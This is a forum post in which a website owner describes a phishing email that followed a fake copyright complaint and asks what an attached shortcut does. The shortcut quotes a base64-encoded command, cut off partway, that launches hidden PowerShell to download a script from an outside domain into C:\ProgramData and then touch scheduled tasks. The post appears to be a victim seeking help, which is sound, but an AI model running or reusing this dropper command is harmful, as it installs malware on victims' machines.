What hack is this and what does it do?

I received an email from someone saying that my website was using one or multiple copywritten images. It didn't seem likely but I responded asking the person to identify the offending images and I'd be happy to remove them.

The person responded the next day with a zip file containing a shortcut to:

%systemroot%\System32\cmd.exe /c echo c3RhcnQgL21pbiBwb3dlcnNoZWxsIC1jb21tYW5kICJJV1IgLVVzZUJhc2ljUGFyc2luZyAnaHR0cHM6Ly9tYXlhbmJvYXRzLmNvbS93cC1jb250ZW50L3VwbG9hZHMvb2xkZXIucGhwJyAtT3V0RmlsZSAnQzpcUHJvZ3JhbURhdGFcRmxqOWZTUEUuanMnOyBzY2h0YXNrcyAvZGVsZXRlIC9mI 

I'm obviously not going to launch the shortcut, but i am curious as to what it would do. It looks like it would just write what looks like a key somewhere.

submitted by /u/tman152
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from hacking: security in practice https://ift.tt/AbugeP6
